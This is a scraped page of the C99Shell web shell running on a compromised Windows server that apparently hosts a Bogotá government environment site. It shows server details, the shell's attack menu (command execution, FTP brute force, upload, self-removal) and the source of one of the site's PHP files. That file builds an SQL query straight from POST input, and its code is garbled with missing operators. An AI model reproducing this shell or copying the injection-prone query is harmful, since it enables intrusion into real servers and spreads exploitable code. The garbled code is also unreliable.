!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\actores\Secretariaambiente\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     select_modifica_participantes_AA.php (2.59 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Documento sin t&iacute;tulo</title>
<script src="js/jquery-1.4.2.js" type="text/javascript"></script>
<script type="text/javascript">
function showgenero(str)
{
if (str=="")
{
document.getElementById("listado").innerHTML="";
return;
}
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("listado").innerHTML=xmlhttp.responseText;
}
}
//xmlhttp.open("GET","getuser.php?q="+str,true);
xmlhttp.open("GET","?q="+str,true);
xmlhttp.send();
}
</script>
<center>
<table border="0">
<?php
$link=mysql_connect($server,$dbusername,$dbpassword);
$select=mysql_select_db($db_name) or die('No hay BD');
?>
<tr><td>
<?php
        echo "<form name='abc' method='POST'>";
        echo "Modificar Instancias"."<BR><BR>";
        echo "Digite nombre Instancia: " "<input type='text' name='instanpartA' id='instanpartA1'> <BR>";
        echo "<BR><input type='submit' name='boton' value='Modificar Instancia'>";
        echo "<input type='hidden' name='abc' value='1'/>";
        echo "</form>";
if (isset($_POST['boton']))
  {  
      $instanpartA=$_POST["instanpartA"];
  }    
$cadena="select * from participantes where nombrepart='$instanpartA'";
$sql=mysql_query($cadena);

   if($reg=mysql_fetch_array($sql))
    {
        echo "<form name='abd' method='POST'>";
        echo "Instancia consultada"."<BR><BR>";
        echo "Nombre Instancia de participaci&oacute;n: " "<input type='text' name='instanpartA' id='instanpartA1' value='" $instanpartA "'> <BR><BR>";
        echo "<select multiple size='10' id='cbogenero1' name='organismo[]'>";
        echo "<option value='X'>Participantes: </option>";
        do
          {
            $entidadespart explode(","$reg['entidadpart']);
            $j=count($entidadespart);$j=$j-1;
            for($i=0;$i<=$j;$i++) {
            echo "<option value='".$entidadespart[$i].", "."'>".$entidadespart[$i].", "."</option>";
            //echo "<option value='".$reg['entidadpart'].", "."'>".$reg['entidadpart'].", "."</option>";
            }
          }while($reg=mysql_fetch_array($sql));
        echo "</select>";
        //echo $j;
        echo "<BR><BR><input type='hidden' name='boton' value='Seleccionar'>";
        echo "<input type='hidden' name='abc' value='1'/>";
        echo "</form>";
    };

?>
</td></tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--